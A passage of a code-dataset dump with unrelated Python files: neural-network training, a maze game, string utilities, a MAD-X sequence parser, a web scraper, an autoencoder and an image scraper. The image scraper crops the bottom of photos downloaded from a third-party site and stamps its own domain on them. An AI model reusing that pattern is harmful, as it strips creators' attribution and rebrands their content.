activation='tanh'))\n\n# This functions compiles the above model with its associated loss function and optimizer\n# We used mean squared error as the loss function with the stochastic gradient descent optimizer\nmodel.compile(loss='mean_squared_error',\n optimizer='sgd',\n metrics=['accuracy'])\n\n# This trains the model using 500 epochs and a batch size of 50\nmodel.fit(X_train, y_train,\n epochs=500,\n batch_size=50, verbose=1)\n\n# This was used to return the model's predictions (probabilities) on the test set\n# As well as convert the probabilities to the class labels\ny_pred_2 = model.predict(X_test)\ny_pred_bool = (y_pred_2 >= 0.5)\n\n# This evaluates the trained model on the test sets\nscore, acc = model.evaluate(X_test, 
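What convert_to_numpy above does to a row whose cells hold stringified lists; the values are toy stand-ins for the one-hot columns, and the function will also emit its isinstance debug prints:
row = np.array([["[1, 0, 0]", 2.5]], dtype=object)   # invented two-cell row
print(convert_to_numpy(row))
# [[1.  0.  0.  2.5]] -- the stringified list is literal_eval'd and flattened in place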
y_test, batch_size=100)\nprint('Test accuracy: ', acc)\n\ncm = confusion_matrix(y_test, y_pred_bool)\nprint(cm)\nprint(roc_auc_score(y_test, y_pred_2))\n\n# This is our third model which was a shallow neural network that used sigmoid activation functions\n# Dropout was used as regularization of our network and each layer had 64 nodes\nmodel = Sequential()\nmodel.add(Dense(64, input_dim=25, activation='hard_sigmoid'))\nmodel.add(Dropout(0.1))\nmodel.add(Dense(64, activation='hard_sigmoid'))\nmodel.add(Dropout(0.1))\nmodel.add(Dense(1, activation='hard_sigmoid'))\n \n#This functions compiles the above model with its associated loss function and optimizer\n# We used binary cross entropy error as the loss function with the stochastic gradient descent optimizer\nmodel.compile(loss='binary_crossentropy',\n optimizer='sgd',\n metrics=['accuracy'])\n\n# This trains the model using 500 epochs and a batch size of 50\nmodel.fit(X_train, y_train,\n epochs=500,\n batch_size=50, verbose=1)\n\n# This was used to return the model's predictions (probabilities) on the test set\n# As well as convert the probabilities to the class labels\ny_pred_3 = model.predict(X_test)\ny_pred_bool = (y_pred_3 >= 0.5)\n\n# This evaluates the trained model on the test sets\nscore, acc = model.evaluate(X_test, y_test, batch_size=100)\nprint('Test accuracy: ', acc)\ncm = confusion_matrix(y_test, y_pred_bool)\nprint(cm)\nprint(roc_auc_score(y_test, y_pred_3))\n\n# This section of code determines the false positive rates and true positive rates\n# for each model in addition to the AUC so that the ROC Curves can be plotted\nfrom sklearn.metrics import roc_curve\nfpr_keras_1, tpr_keras_1, thresholds_keras_1 = roc_curve(y_test, y_pred_1.ravel())\nfrom sklearn.metrics import auc\nauc_keras_1 = auc(fpr_keras_1, tpr_keras_1)\n\nfpr_keras_2, tpr_keras_2, thresholds_keras_2 = roc_curve(y_test, y_pred_2.ravel())\nauc_keras_2 = auc(fpr_keras_2, tpr_keras_2)\n\n\nfpr_keras_3, tpr_keras_3, thresholds_keras_3 = roc_curve(y_test, y_pred_3.ravel())\nauc_keras_3 = auc(fpr_keras_3, tpr_keras_3)\n\n# This code plots all of the ROC curves onto one plot so that they can be compared effectively\nplt.figure(1)\nplt.plot([0, 1], [0, 1], 'k--')\nplt.plot(fpr_keras_1, tpr_keras_1, label='Model 1 (area = {:.3f})'.format(auc_keras_1))\nplt.plot(fpr_keras_2, tpr_keras_2, label='Model 2 (area = {:.3f})'.format(auc_keras_2))\nplt.plot(fpr_keras_3, tpr_keras_3, label='Model 3 (area = {:.3f})'.format(auc_keras_3))\nplt.xlabel('False positive rate')\nplt.ylabel('True positive rate')\nplt.title('ROC curve')\nplt.legend(loc='best')\nplt.show()\n","sub_path":"train/neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":6955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"99818133","text":"\"\"\"Maze game\nPython3\nUTF-8\"\"\"\n\nimport random\nimport pygame\n\nfrom constants import WINDOW, YOUWIN, YOULOST\nfrom maze import Maze\nfrom characters import Characters, MacGyver\nfrom items import Items\n\nif __name__ == '__main__':\n pygame.init()\n\n MAZE = Maze('structure.txt')\n MAZE.read()\n\n ITEM1_POS = Items.random_position()\n ITEM2_POS = Items.random_position()\n ITEM3_POS = Items.random_position()\n\n MacGyver.act_pos = (MacGyver.find_macgyver())\n GUARD_POS = (Characters.find_guardian())\n\n \"\"\"Principal loop\"\"\"\n GAME = 1\n while GAME:\n MAZE.display()\n pygame.display.flip()\n\n Items.check_items(ITEM1_POS, ITEM2_POS, ITEM3_POS, MacGyver.act_pos)\n\n 
MacGyver.movements_and_quit((MacGyver.act_pos))\n MacGyver.print_mg((MacGyver.pix_position))\n\n if MacGyver.asleep_guardian(GUARD_POS, MacGyver.act_pos) != 0:\n if MacGyver.asleep_guardian(GUARD_POS, MacGyver.act_pos) == 1:\n print(\"You win\")\n WINDOW.blit(YOUWIN, (0, 0))\n pygame.display.flip()\n pygame.time.wait(5000)\n GAME = 0\n\n if MacGyver.asleep_guardian(GUARD_POS, MacGyver.act_pos) == 2:\n print(\"You lost\")\n WINDOW.blit(YOULOST, (0, 0))\n pygame.display.flip()\n pygame.time.wait(5000)\n GAME = 0\n\n pygame.display.quit()\n pygame.quit()\n exit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"514875421","text":"\"\"\"\nReverse a String - Enter a string and the program will reverse it and print it out.\n\nPig Latin - Pig Latin is a game of alterations played on the English language game.\nTo create the Pig Latin form of an English word the initial consonant sound is transposed\nto the end of the word and an ay is affixed.\n\nCount Vowels - Enter a string and the program counts the number of vowels in the text.\nFor added complexity have it report a sum of each vowel found.\n\nCheck if Palindrome - Checks if the string entered by the user is a palindrome.\nThat is that it reads the same forwards as backwards.\n\nCount Words in a String - Counts the number of individual words in a string.\nFor added complexity read these strings in from a text file and generate a summary.\n\"\"\"\n\n\nclass MyString:\n \"\"\"\n Class that store strings\n \"\"\"\n @staticmethod\n def reverse(some_seq):\n \"\"\"\n :param some_seq: Sequence\n :return: Sequence: reversed version\n \"\"\"\n return some_seq[::-1]\n\n @staticmethod\n def count_vowels(vowel_str):\n \"\"\"\n :param vowel_str: String\n :return: Integer: No. 
of vowels or 0\n \"\"\"\n vowels = \"aeiou\"\n count = {char: 0 for char in vowels}\n for char in vowel_str:\n if char in vowels:\n count[char] += 1\n return count\n\n def is_palindrome(self, some_seq):\n \"\"\"\n :param some_seq: sequence of anything\n :return: Boolean: palindrome check of sequence passed\n \"\"\"\n return some_seq == self.reverse(some_seq)\n\n @staticmethod\n def count_words(word_str=None, file=None):\n \"\"\"\n :param word_str: A string\n :param file: A file to be read\n \"\"\"\n word_count = 0\n if word_str:\n word_count = len(word_str.split())\n if file:\n with open(file) as f_str:\n word_count = len(f_str.read().split())\n return word_count\n\n def find_in_iter(self, some_iter):\n \"\"\"just an example for someone.\"\"\"\n return self.str_iter(some_iter) if isinstance(some_iter, str) \\\n else self.int_iter(some_iter) if isinstance(some_iter[0], int) else None\n\n @staticmethod\n def str_iter(iteration):\n \"\"\"str\"\"\"\n\n def cond(sequence, con_str):\n \"\"\"cond\"\"\"\n return [char for char in con_str if char in sequence]\n\n vowels = \"a,e,i,o,u\"\n return [word for word in iteration.lower().split(\" \") if len(cond(vowels, word)) > 1]\n\n @staticmethod\n def int_iter(iteration):\n \"\"\"int\"\"\"\n return [num for num in iteration if num > 5]\n\n @staticmethod\n def pig_latin(pig_str):\n \"\"\"\n Pig Latin – Pig Latin is a game of alterations played on the English language game.\n To create the Pig Latin form of an English word the initial consonant sound is transposed\n to the end of the word and an ay is affixed\n \"\"\"\n words = []\n vowels = 'aeiou'\n for word in pig_str.split():\n if len(word) > 2 and word[0] not in vowels:\n words.append(word[1:] + '-' + word[0] + 'ay')\n else:\n words.append(word + '-ay')\n return ' '.join(words)\n\n\nif __name__ == '__main__':\n X = input(\"Type Something: \")\n STR = MyString()\n print(\"Reversed sequence is: \", STR.reverse(X))\n print(\"Amount of vowels are: \", STR.count_vowels(X))\n print(\"Is the word palindrome: \", STR.is_palindrome(X))\n print(\"Amount of words are: \", STR.count_words(X))\n print(\"The iterations are: \", STR.find_in_iter(X))\n print(\"The pig latins are: \", STR.pig_latin(X))\n","sub_path":"projects/text_list.py","file_name":"text_list.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"22727950","text":"\"\"\"\n Functions to create mapping from variables to magnets based on sequence_file.\n Assumptions:\n\n - magnets named \"mb.***\" are defined by their bending radius and are hence immutable!\n - Sequence is saved in a way, that magnets definitions contain 'knl:={}', 'ksl:={}' or 'K#:='\n - There is only one value in each knl/ksl array.\n - zero-offset, i.e. no fixed number summation (see hint below)\n - linearity, i.e. variables do not multiply with each other (will result in zeros)\n - the variable-name is final (i.e. it is not reassigned by ':=' somewhere else)\n - the variable-name does not start with \"l.\" (reserved for length multiplier)\n - the length multiplier is given by l.\n - apart from the length, there are no other named multipliers (numbers are fine)\n\n If a magnet is redefined, the last definition is used. (not really an assumption)\n\n HINT: 'magnet := #.### + var' WILL NOT RESULT IN A VALID MAPPING !!!\n (e.g. 
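Hand-computed outputs for the MyString helpers above:
s = MyString()
print(s.reverse("abc"))                 # 'cba'
print(s.is_palindrome("racecar"))       # True
print(s.pig_latin("hello world"))       # 'ello-hay orld-way'
print(s.count_words("one two three"))   # 3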
'1 + var' is indistinguishable from '2 * var', which is not what you want!)\n\"\"\"\n\nimport cPickle as pickle\nimport os\nimport re\nfrom collections import OrderedDict\n\nimport pandas as pd\n\nfrom Utilities import logging_tools as logtool\nfrom Utilities import tfs_pandas as tfs\nfrom Utilities.contexts import timeit\nfrom Utilities.iotools import json_dumps_readable\n\nLOG = logtool.get_logger(__name__)\n\nEXT = \"varmap\" # Extension Standard\n\n\"\"\"\n============================= Main =============================\n\"\"\"\nDEFAULT = {\n 'return': \"dictionary\",\n 'ret_choices': [\"dataframe\", \"dictionary\"],\n}\n\n\ndef parse_variable_mapping(seqfile_path, ret=DEFAULT['return']):\n \"\"\" Main Function for creating the variable mapping\n\n Args:\n seqfile_path: Saved Sequence file\n ret: return format, either \"tfs\" or \"dictionary\"\n\n Returns:\n Dictionary of orders containing either a\n DataFrame of magnets(index) vs. variables(columns)\n containing the variable-coefficients\n or a\n Dictionary of all variables containing magnet-coefficient Series\n \"\"\"\n LOG.info(\"Parsing file '{:s}'\".format(seqfile_path))\n\n _check_ret(ret)\n\n with timeit(lambda t:\n LOG.debug(\" File parsed in {:f}s\".format(t))):\n magnet_strings, length_constants = _read_file_for_magnets(seqfile_path)\n if ret.lower() == \"dataframe\":\n return _build_variable_mapping_df(magnet_strings, length_constants)\n\n elif ret.lower() == \"dictionary\":\n return _build_variable_mapping_dict(magnet_strings, length_constants)\n\n\ndef load_variable_mapping(seqfile_path, ret=DEFAULT['return']):\n \"\"\" Load mapping from file(s).\n\n Args:\n seqfile_path: Saved Sequence file\n ret: return format, either \"tfs\" or \"dictionary\"\n\n Returns:\n Dictionary of orders containing either a\n DataFrame of magnets(index) vs. 
variables(columns)\n containing the variable-coefficients\n or a\n Dictionary of all variables containing magnet-coefficient Series\n \"\"\"\n _check_ret(ret)\n varmapfile_path = seqfile_path.replace(\".seq\", \"\").replace(\".\" + EXT, \"\")\n if ret == \"dictionary\":\n full_file_path = \"{f:s}.{e:s}\".format(f=varmapfile_path, e=EXT)\n with open(full_file_path, \"rb\") as varmapfile:\n mapping = pickle.load(varmapfile)\n LOG.debug(\"Loaded mapping from varmap file '{:s}'.\".format(full_file_path))\n\n elif ret == \"dataframe\":\n varmapfile_name = os.path.basename(varmapfile_path)\n order = []\n for f in os.listdir(os.path.dirname(varmapfile_path)):\n if f.startswith(varmapfile_name) and f.endswith(EXT):\n order += [f.replace(varmapfile_name + \".\", \"\").replace(\".\" + EXT, \"\")]\n\n if len(order) == 0:\n raise IOError(\"Could not find varmap files of scheme: '{f:s}.{o:s}.{e:s}'\".format(\n f=varmapfile_path, o=\"(order)\", e=EXT))\n\n mapping = dict.fromkeys(order)\n for o in order:\n full_file_path = \"{f:s}.{o:s}.{e:s}\".format(f=varmapfile_path, o=o, e=EXT)\n mapping[o] = tfs.read_tfs(full_file_path)\n LOG.debug(\"Loaded mapping from varmap file '{:s}'.\".format(full_file_path))\n return mapping\n\n\ndef save_variable_mapping(mapping, outfile_path, format=DEFAULT['return']):\n \"\"\" Save mapping to file(s).\n\n Args:\n mapping: The mapping to save\n outfile_path: Output File, either extension \"\",\".seq\",\".varmap\" will be changed to \".varmap\"\n format: mapping format, either \"tfs\" or \"dictionary\"\n \"\"\"\n _check_ret(format)\n varmapfile_path = outfile_path.replace(\".seq\", \"\").replace(\".\" + EXT, \"\")\n\n if format == \"dictionary\":\n full_file_path = \"{f:s}.{e:s}\".format(f=varmapfile_path, e=EXT)\n with open(full_file_path, \"wb\") as varmapfile:\n pickle.dump(mapping, varmapfile, -1)\n LOG.debug(\"Saved Variable mapping into file '{:s}'\".format(full_file_path))\n\n elif format == \"dataframe\":\n for order in mapping:\n full_file_path = \"{f:s}.{o:s}.{e:s}\".format(f=varmapfile_path, o=order, e=EXT)\n tfs.write_tfs(full_file_path,\n mapping[order],\n save_index=True)\n LOG.debug(\"Saved Variable mapping into file '{:s}'\".format(full_file_path))\n\n\ndef load_or_parse_variable_mapping(seqfile_path, ret=DEFAULT['return']):\n \"\"\" Load mapping, or parse if not found. Convenience wrapper for parse and load functions.\n\n Loads variable mapping from a file. If not found it will do the parsing instead and saves\n the results for later use.\n\n Args:\n seqfile_path: Saved Sequence file\n ret: return format, either \"tfs\" or \"dictionary\"\n\n Returns:\n Dictionary of orders containing either a\n DataFrame of magnets(index) vs. 
variables(columns)\n containing the variable-coefficients\n or a\n Dictionary of all variables containing magnet-coefficient Series\n\n \"\"\"\n _check_ret(ret)\n try:\n mapping = load_variable_mapping(seqfile_path, ret=ret)\n except IOError:\n mapping = parse_variable_mapping(seqfile_path, ret=ret)\n try:\n save_variable_mapping(mapping, seqfile_path, format=ret)\n except IOError as e:\n LOG.warn(\" IOError: {:s}.\".format(e.message))\n return mapping\n\n\ndef varmap_variables_to_json(varmap_or_file, outfile_path=None, format=DEFAULT['return']):\n \"\"\" Saves all variable names from mapping to json file.\n\n The variables will be saved by their order in the file.\n\n Args:\n varmap_or_file: varmap or saved varmap-file (sequence file is okay as well)\n format: varmap format, either \"tfs\" or \"dictionary\"\n \"\"\"\n _check_ret(format)\n LOG.debug(\"Converting varmap to json-file.\")\n if isinstance(varmap_or_file, basestring):\n mapping = load_or_parse_variable_mapping(varmap_or_file, ret=format)\n if outfile_path is None:\n outfile_path = varmap_or_file.replace(\".seq\", \"\").replace(\".\" + EXT, \"\") + \"_all_list.json\"\n else:\n mapping = varmap_or_file\n if outfile_path is None:\n IOError(\"Outputfile not given!\")\n\n json_dict = OrderedDict.fromkeys(sorted(mapping.keys()))\n for order in mapping:\n if format == \"dictionary\":\n json_dict[order] = sorted(mapping[order].keys())\n elif format == \"dataframe\":\n json_dict[order] = sorted(mapping[order].columns.tolist())\n\n json_dict[\"all\"] = sorted(list(set([var for order in json_dict for var in json_dict[order]])))\n\n json_dumps_readable(outfile_path, json_dict)\n LOG.debug(\"Variables saved to '{:s}'.\".format(outfile_path))\n\n\n\"\"\"\n============================= Read Sequence =============================\n\"\"\"\n\n\ndef _read_file_for_magnets(sequence_file):\n \"\"\" Read the file and return the magnet definitions and magnet lengths \"\"\"\n LOG.debug(\" Reading File\")\n length_constants = {}\n magnet_strings = {}\n with open(sequence_file, 'r') as f_seq:\n for line in f_seq:\n var_and_value = _find_element_length(line)\n if var_and_value is not None:\n length_constants[var_and_value[0]] = var_and_value[1]\n else:\n var_and_value = _find_magnet_strength(line)\n if var_and_value is not None:\n magnet_strings[var_and_value[0]] = var_and_value[1]\n return magnet_strings, length_constants\n\n\ndef _find_element_length(line):\n \"\"\" Search for length variable in line \"\"\"\n match = re.match(r\"const\\s(l\\.[^;]+)\", line)\n if match is not None:\n eq = match.group(1).replace(\" \", \"\")\n return eq.split(\"=\")\n else:\n return None\n\n\ndef _find_magnet_strength(line):\n \"\"\" Search for magnet strengths in line\n \"\"\"\n line = line.lower()\n matches = list(re.finditer(\n r\",\\s*k((?P[ns])l:=\\{(?P[^\\}]+)\\}|(?P\\d+s?):=(?P[^,]+))\", line))\n\n if len(matches) > 0:\n magnet = re.match(r\"[\\w.]*\", line).group(0)\n\n knl_dict = {}\n for match in matches:\n if match.group(\"knl\") is not None:\n skew = \"S\" if match.group('s') == \"s\" else \"\"\n knls = match.group('knl').split(',')\n for n, knl in enumerate(knls):\n try:\n float(knl) # check could also be \"len(knl) > 1\"\n except ValueError:\n ########## HACK TO AVOID DIPOLES AS THEY ARE DEFINED BY LRAD!\n # TODO: Find a way to change dipoles in MADX!?\n if n == 0 and not re.search(r\":\\s*multipole\\s*,\", line):\n return None\n ##############################################################\n order = \"K{n:d}{skew:s}L\".format(n=n, skew=skew)\n 
knl_dict[order] = knl.replace(\" \", \"\")\n else:\n if match.group(\"n\") in ['0', '0s']:\n # dipole strength are defined by their angles\n knl = re.search(r\"angle\\s*:=\\s*([^,]+)\", line).group(1)\n else:\n length = \"l.\" + re.search(r\":(?!=)\\s*([^,]+)\", line).group(1)\n knl = \"({kn:s}) * {l:s}\".format(kn=match.group(\"k\"), l=length)\n\n order = \"K{:s}L\".format(match.group(\"n\").upper())\n knl_dict[order] = knl.replace(\" \", \"\")\n\n return magnet, knl_dict\n else:\n return None\n\n\n\"\"\"\n============================= Build Mapping =============================\n\"\"\"\n\n\ndef _build_variable_mapping_df(magnet_strings, length_constants):\n \"\"\" Build the data frame representing the mapping variables to magnets and return as df\n SLOW!!\n \"\"\"\n LOG.debug(\" Building Dataframe Mapping\")\n var_to_mag = {}\n for magnet in magnet_strings:\n for order, value_string in magnet_strings[magnet].iteritems():\n if order not in var_to_mag:\n var_to_mag[order] = tfs.TfsDataFrame()\n\n k_dict = _eval_magnet_strength(value_string, length_constants)\n var_to_mag[order] = var_to_mag[order].append(\n tfs.TfsDataFrame([k_dict.values()],\n index=[magnet],\n columns=k_dict.keys()\n )).fillna(0)\n return var_to_mag\n\n\ndef _build_variable_mapping_dict(magnet_strings, length_constants):\n \"\"\" Build the data frame representing the mapping variables to magnets and return as dict\n Faster!\n \"\"\"\n LOG.debug(\" Building Dictionary Mapping\")\n var_to_mag = {}\n for magnet in magnet_strings:\n for order, value_string in magnet_strings[magnet].iteritems():\n if order not in var_to_mag:\n var_to_mag[order] = {}\n\n k_dict = _eval_magnet_strength(value_string, length_constants)\n for var in k_dict:\n try:\n var_to_mag[order][var].loc[magnet] = k_dict[var]\n except KeyError:\n var_to_mag[order][var] = pd.Series(k_dict[var], index=[magnet])\n return var_to_mag\n\n\ndef _eval_magnet_strength(k_string, length_constants):\n \"\"\" Evaluate the magnet-strength string and return dictionary with values \"\"\"\n # replace element-length multiplier by their value\n el_length = re.search(r\"l\\.[\\w.]+\", k_string)\n if el_length is not None:\n l_var = el_length.group(0)\n k_string = k_string.replace(l_var, length_constants[l_var])\n\n # get variable names\n variables = re.findall(r\"[a-zA-Z][\\w.]*\", k_string)\n d = {}\n for variable in variables:\n # replace current variable by 1 and all others by 0\n knl_temp = k_string\n for other in variables:\n knl_temp = knl_temp.replace(other, \"1\" if variable == other else \"0\")\n\n # evaluate coefficient (let python sort out parenthesis, order etc.)\n d[variable] = eval(knl_temp)\n\n return d\n\n\n\"\"\"\n============================= Helper =============================\n\"\"\"\n\n\ndef _check_ret(ret):\n \"\"\" Checks if the given 'ret' value is valid \"\"\"\n if ret not in DEFAULT[\"ret_choices\"]:\n ValueError(\"Return format '{ret:s}' unknown, choices: {choices:s}\".format(\n ret=ret, choices=\", \".join(DEFAULT[\"ret_choices\"])\n ))\n\n\nif __name__ == '__main__':\n # # Testing:\n # import os\n # seq_name = \"lhcb1_tmp.seq\"\n # df = load_or_parse_variable_mapping(os.path.join(\"tests\", seq_name))\n # varmap_variables_to_json(df, seq_name)\n raise EnvironmentError(\"{:s} is not meant to be run as main.\".format(__file__))\n\n","sub_path":"twiss_optics/sequence_parser.py","file_name":"sequence_parser.py","file_ext":"py","file_size_in_byte":13718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} 
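The coefficient extraction inside _eval_magnet_strength above leans on the linearity assumption stated in the module docstring: substitute 1 for one variable and 0 for the rest, and eval() returns that variable's coefficient. In isolation, with an invented strength string:
import re

k_string = "(kqx) * 0.32 + 2 * kqy"          # invented variable names
variables = re.findall(r"[a-zA-Z][\w.]*", k_string)
coeffs = {}
for var in variables:
    expr = k_string
    for other in variables:
        expr = expr.replace(other, "1" if var == other else "0")
    coeffs[var] = eval(expr)                 # parentheses and order handled by Python
print(coeffs)                                # {'kqx': 0.32, 'kqy': 2}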
+{"seq_id":"437026144","text":"import string\n\nfrom bs4 import BeautifulSoup\nfrom scraper import Scraper\n\nimport utils\n\n\nclass SiteScraper:\n\n def __init__(self, name, start_date, end_date, driver):\n self.parsers = [self._parser]\n self.driver = driver\n self.scraper = None\n self.scraper_name = name\n self.start_date = start_date\n self.end_date = end_date\n\n def scrape_alphabet(self):\n self.scraper = Scraper(\n self.scraper_name,\n start_date=self.start_date,\n end_date=self.end_date\n )\n self.scraper.headers = [\n 'Grantor',\n 'Grantee',\n 'Recorded Date',\n 'Doc #',\n 'Doc Title',\n ]\n self.scraper.csvheaders = self.scraper.headers\n self.scraper.run(self.parsers)\n\n def _parser(self, start='', deeper=False):\n all_rows = []\n search_term_generator = self._generate_search_terms(start, deeper)\n\n for term in search_term_generator:\n result_html = self._search_for_term(term)\n rows = self._get_rows_from_html(result_html)\n if len(rows) > utils.MAXIMUM_RESULTS_PER_PAGE:\n all_rows.extend(self._parser(term, True))\n else:\n all_rows.extend(rows)\n\n return all_rows\n\n def _search_for_term(self, term):\n self.driver.get(utils.ROOT_URL)\n search_field = self.driver.find_element_by_id(utils.SEARCH_FIELD_ID)\n start_date = self.driver.find_element_by_id(utils.START_DATE_FIELD_ID)\n end_date = self.driver.find_element_by_id(utils.END_DATE_FIELD_ID)\n\n search_field.send_keys(term)\n start_date.send_keys(self.start_date)\n end_date.send_keys(self.end_date)\n\n self.driver.find_element_by_name(utils.SUBMIT_BUTTON_ID).click()\n\n return self.driver.page_source\n\n def _generate_search_terms(self, start='', deeper=False):\n if not start and not deeper:\n for letter in string.ascii_lowercase:\n yield letter\n elif start and deeper:\n for letter in string.ascii_lowercase:\n yield start + letter\n else:\n raise ValueError('Search term generator: wrong arguments!')\n\n def _get_rows_from_html(self, html):\n rows_dict = []\n\n soup = BeautifulSoup(html, \"html.parser\")\n for body_row in soup.select('table tr'):\n cells = body_row.findAll('td')\n element_contents = [element.contents[0] for element in cells]\n\n element_contents = map(utils.get_text, element_contents)\n\n elem = dict(zip(self.scraper.headers, element_contents))\n if not utils.is_element_valid(elem):\n continue\n\n rows_dict.append(elem)\n\n return rows_dict","sub_path":"site_scraper.py","file_name":"site_scraper.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"649881310","text":"import numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom skimage.measure import compare_ssim as SSIM\n\nfrom util.metrics import PSNR\n\n\nclass Encoder(nn.Module):\n def __init__(self, inchans=1, nz=32):\n super(Encoder, self).__init__()\n self.convlist=nn.ModuleList([nn.Conv2d(inchans,32, kernel_size=4, stride=2, padding=1),#x/2\n nn.Conv2d(32, 32, kernel_size=4, stride=2, padding=1),#x/4 /2\n nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1),#x/4 /1\n nn.Conv2d(32, 64, kernel_size=4, stride=2, padding=1),#x/8 /2\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),#x/8 /1\n nn.Conv2d(64, 128, kernel_size=4, stride=2, padding=1),#x/16 /2\n nn.Conv2d(128, 64, kernel_size=3, stride=1, padding=1),#x/16 /1\n nn.Conv2d(64, 32, kernel_size=3, stride=1, padding=1),#x/16 /1\n nn.Conv2d(32, nz, kernel_size=8, stride=1, padding=0)])#x/(16*8) /8\n def forward(self, x):\n for i, l in enumerate(self.convlist[:-1]):\n x=l(x)\n 
x=F.leaky_relu(x, negative_slope=0.2)\n \n out=self.convlist[-1](x)\n return out\nclass Decoder(nn.Module):\n def __init__(self, outchans=1, nz=32):\n super(Decoder, self).__init__()\n self.convlist=nn.ModuleList([\n nn.ConvTranspose2d(nz,32,kernel_size=8, stride=8, padding=0), #x8 \n nn.Conv2d(32, 64, kernel_size=3, stride=1, padding=1),#x1\n nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1),#x1\n nn.ConvTranspose2d(128, 64, kernel_size=4, stride=2, padding=1),#x2\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),#x1\n nn.ConvTranspose2d(64, 32, kernel_size=4, stride=2, padding=1),#x2\n nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1),#x1\n nn.ConvTranspose2d(32, 32, kernel_size=4, stride=2, padding=1),#x2\n nn.ConvTranspose2d(32,outchans, kernel_size=4, stride=2, padding=1)#x2\n ])\n def forward(self, x):\n for i, l in enumerate(self.convlist[:-1]):\n x=l(x)\n x=F.leaky_relu(x, negative_slope=0.2)\n \n out=self.convlist[-1](x)\n return out\nclass CAE(nn.Module):\n def __init__(self, inchans=3, nz=32):\n super(CAE, self).__init__()\n self.enc=Encoder(inchans=inchans, nz=nz)\n self.dec=Decoder(outchans=inchans, nz=nz)\n def forward(self, x):\n z=self.enc(x)\n out=self.dec(z)\n return out\n\n\nclass DeblurModel(nn.Module):\n def __init__(self):\n super(DeblurModel, self).__init__()\n\n def get_input(self, data):\n img = data['a']\n inputs = img\n targets = data['b']\n inputs, targets = inputs.cuda(), targets.cuda()\n return inputs, targets\n\n def tensor2im(self, image_tensor, imtype=np.uint8):\n image_numpy = image_tensor[0].cpu().float().numpy()\n #image_numpy = (np.transpose(image_numpy, (1, 2, 0)) + 1) / 2.0 * 255.0\n image_numpy = (np.transpose(image_numpy, (1, 2, 0)))* 255.0\n return image_numpy.astype(imtype)\n\n def get_images_and_metrics(self, inp, output, target) -> (float, float, np.ndarray):\n inp = self.tensor2im(inp)\n fake = self.tensor2im(output.data)\n real = self.tensor2im(target.data)\n psnr = PSNR(fake, real)\n ssim = SSIM(fake, real, multichannel=True)\n vis_img = np.hstack((inp, fake, real))\n return psnr, ssim, vis_img\n\n\ndef get_model(model_config):\n return DeblurModel()\n","sub_path":"models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"270636423","text":"# Raspberry Pi Weather Station Temperature Processing\n# Created: July 27, 2017\n# By: Dan Kane\n \n# This workflow demonstrates how to create a processed stream which can be visualized\n# on the dashboard or used to trigger other workflows. The Raspberry Pi reports temperature\n# in Celsius. 
This workflow converts Celsius to Fahrenheit and creates a processed output\n# stream in Fahrenheit.\n \n \nTinC = float(IONode.get_input('in1')['event_data']['value'])\nTinF = round(TinC*1.8 + 32,2)\n \noutput_dict = {}\noutput_dict['Temp_Proc'] = TinF\nIONode.set_output('out1', output_dict)\n","sub_path":"workflow-code/process-temperature-workflow.py","file_name":"process-temperature-workflow.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"156741884","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport os\nimport time\nimport threading\nimport hashlib\nfrom urllib.parse import quote\nfrom multiprocessing import Pool, cpu_count\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom PIL import Image, ImageDraw, ImageFont\n\nHEADERS = {\n 'X-Requested-With': 'XMLHttpRequest',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 '\n '(KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\n 'Referer': \"http://www.mmjpg.com\"\n}\n\n# DIR_PATH = r\"E:\\mmjpg\" # 下载图片保存路径\n\nDIR_PATH = r\"/application/image\"\n\n# 指定要使用的字体和大小;/Library/Fonts/是macOS字体目录;Linux的字体目录是/usr/share/fonts/\nfont = ImageFont.truetype(r\"./font/msyh.ttf\", 21)\n\n# 保存路径\nreques_url = r\"http://127.0.0.1:9999/lovehot/api/v1/rest/postImageData\"\n\n\ndef save_pic(pic_src, pic_cnt):\n \"\"\"\n 将图片下载到本地文件夹\n \"\"\"\n try:\n img = requests.get(pic_src, headers=HEADERS, timeout=60)\n img_name = \"love_img_{}.jpg\".format(pic_cnt + 1)\n with open(img_name, 'ab') as f:\n f.write(img.content)\n print(img_name)\n\n im = Image.open(img_name)\n # 图片的宽度和高度\n img_size = im.size\n # print(\"图片宽度和高度分别是{}\".format(img_size))\n w = img_size[0]\n h = img_size[1] - 22\n x = 0\n y = 0\n region = im.crop((x, y, w, h))\n region.save(img_name)\n add_text_to_image(region, img_name, 'h.love5868.com')\n except Exception as e:\n print(e)\n\n\n# image: 图片 text:要添加的文本 font:字体\ndef add_text_to_image(image, img_name, text, font=font):\n try:\n draw = ImageDraw.Draw(image)\n text_size_x, text_size_y = draw.textsize(text, font=font)\n # 设置文本文字位置\n text_xy = (image.size[0] - text_size_x - 10, image.size[1] - text_size_y - 20)\n draw.text(text_xy, text, (255, 0, 0), font=font) # 设置文字位置/内容/颜色/字体\n draw = ImageDraw.Draw(image)\n image.save(img_name)\n except Exception as e:\n print(\"水印异常=====>\")\n print(e)\n\n\ndef make_dir(folder_name):\n \"\"\"\n 